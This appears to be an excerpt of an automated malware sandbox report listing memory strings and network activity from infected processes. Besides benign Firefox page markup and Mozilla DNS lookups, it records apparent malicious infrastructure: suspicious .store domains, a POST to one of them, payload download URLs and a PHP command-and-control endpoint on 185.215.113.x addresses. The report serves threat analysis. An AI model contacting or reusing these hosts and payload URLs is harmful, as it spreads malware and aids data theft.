aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSTurl('chrome://activity-stream/content/data/content/assets/device-migration.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSTurl('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEurl('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSTurl('chrome://activity-stream/content/data/content/assets/device-migration.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSTurl('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEurl('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSTurl('chrome://activity-stream/content/data/content/assets/device-migration.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSTurl('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEurl('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C068000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3260229875.0000019E4C0EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BFF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/6
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/6ae
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/X
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/aa
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/i
Source: file.exe, file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe)
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeW
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeg
Source: file.exe, file.exe, 00000000.00000003.2356103217.000000000155D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe1
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeV
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeee
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeeg
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php//
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php9
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpg
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/9
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/K
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microx
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
